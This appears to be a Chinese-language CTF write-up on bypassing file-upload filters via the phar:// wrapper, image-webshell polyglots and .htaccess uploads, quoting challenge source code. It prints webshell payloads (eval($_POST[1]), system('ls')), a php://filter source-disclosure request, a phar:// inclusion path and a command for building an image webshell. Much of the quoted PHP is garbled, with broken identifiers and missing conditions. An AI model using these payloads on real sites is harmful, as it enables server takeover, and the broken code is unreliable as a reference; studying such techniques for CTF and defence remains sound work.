最近刷了几道文件上传的题,其中包括 js 绕过、.htaccess 上传、phar 绕过,文件上传的题目一般都是黑盒,白盒审计很少,奇奇怪怪的东西还是挺多的。就我自己来说,做这种题一般都是各种都试试,基本上都能出来。
姿势一:Pr绕过上传限制

首先我们在本地测试一下: 准备一句话木马
test.php
index.php
安恒月赛:image_up
首先我们把源码读出来:
这里是利用伪协议读取源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
index.php
<?phpif(isset($_GET['page'])){if(!stristr($_GET['page'],"..")){$page = $_GET['page'].".php";include($page);}else{header("Location: index.php?page=login"); }}else{header("Location: index.php?page=login");}
login.php
<?phpif(isset($_POST['username'])&&isset($_POST['password'])){header("Location: index.php?page=upload");exit(); }?>
upload.php
<?php$error = "";$exts = array("jpg","png","gif","jpeg");if(!empty($_FILES["image"])){$temp = explode(".", $_FILES["image"]["name"]);$extension = end($temp); if((@$_upfileS["image"]["size"]if(in_array($extension,$exts)){$path = "uploads/".md5($temp[0].time()).".".$extensmove_uploaded_file($_FILES["image"]["tmp_name"], $p $error = "上传成功!";} else{$error = "上传失败!"; }}else{$error = "文件过大,上传失败!";} }?>
这道题就是利用 phar 伪协议去包含我们写好的一句话
具体做法: 木马文件打包成压缩包,然后改后缀,再利用 phar 伪协议读取
phar://./uploads/4h214215521321.jpg/1
最后用蚁剑链接就可以拿到 flag
姿势二:js绕过
例题一
先来做一个吧
合成图片马的命令:copy 1.png /b + 1.txt /a 2.png

system(“ls”)
利用 file 读取上传的文件,发现是解析 php 文件的

先附上源码吧
index.php
?phperror_reporting(0); highlight_file(__FILE__);$file = $_GET['file'];if (preg_match("/flag/", $file)){die('Oh no!');}include $file;?>
file_up1oad.php
<?phperror_reporting(0);date_default_timezone_set('PRC');if(isset($_FILES['file'])) {$file_name = basename($_FILES["file"]["name"]);$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);$file_type = $_FILES['file']['type'];$file_content = $_FILES['file']['tmp_name']; if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {die('Php file ?');}if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/ png'])){die('Bad file');}if (preg_match("/die('Bad file of content !');}if (!file_exists('uploads')){ mkdir('uploads');}$new_filename = md5(time()).'.'.$file_ext;$u = move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $new_filename); if ($u){echo 'Successful'."n";echo '/uploads/'.$new_filename; }}?>File upload
审计了一下,估计也就是 js 合成个图片马
system( 'ls');

/index.php/?file=/var/www/html/uploads/62bfd63a7b411adea7a484c88cbaed0d.png
利用一下文件包含

eval ($_POST[1]);
合成图片马:
直接上传蚁剑连接
<?phpsession_start();echo "Upload 上传文件";error_reporting(0);if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size'];$uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){die("后缀名不能有 ph!");} else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["up loaded"]["size"]$content = file_get_contents($uploaded_tmp);if(preg_match("/die("诶,别蒙我啊,这标志明显还是 php 啊");}else{mkdir(iconv("UTF-8", "GBK", $target_path), 0777,true);move_uploaded_file($uploaded_tmp, $t_path);echo "{$t_path} succesfully uploaded!";}} else{die("上传类型也太露骨了吧!"); }}}?>
姿势三:.htaccess上传



<?phpsession_start();echo "是兄弟就来传 ";if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}?>
upload.php
<?phpsession_start();echo ""; if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size'];$uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){die("我扌 your problem?");}else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") | | ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uplo aded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"]2048)){mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true)move_uploaded_file($uploaded_tmp, $t_path);echo "{$t_path} succesfully uploaded!";}else{die("我扌 your problem?");}}}



